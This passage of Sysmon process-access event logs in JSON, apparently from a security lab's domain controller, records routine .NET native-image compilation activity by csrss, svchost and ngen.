EL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6904,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.074\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001061E30D00}\r\nTargetProcessId: 4664\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.074","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001061E30D00}","TargetProcessId":"4664","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6905,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.074\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001061E30D00}\r\nTargetProcessId: 4664\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.074","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001061E30D00}","TargetProcessId":"4664","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6906,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.121\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001035E70D00}\r\nTargetProcessId: 4632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.121","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001035E70D00}","TargetProcessId":"4632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6907,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.121\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001035E70D00}\r\nTargetProcessId: 4632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.121","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001035E70D00}","TargetProcessId":"4632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6908,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.121\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001035E70D00}\r\nTargetProcessId: 4632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.121","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001035E70D00}","TargetProcessId":"4632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6909,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.183\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001076EB0D00}\r\nTargetProcessId: 4456\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.183","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001076EB0D00}","TargetProcessId":"4456","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6910,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.183\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001076EB0D00}\r\nTargetProcessId: 4456\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.183","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001076EB0D00}","TargetProcessId":"4456","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6911,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.183\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001076EB0D00}\r\nTargetProcessId: 4456\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.183","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001076EB0D00}","TargetProcessId":"4456","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
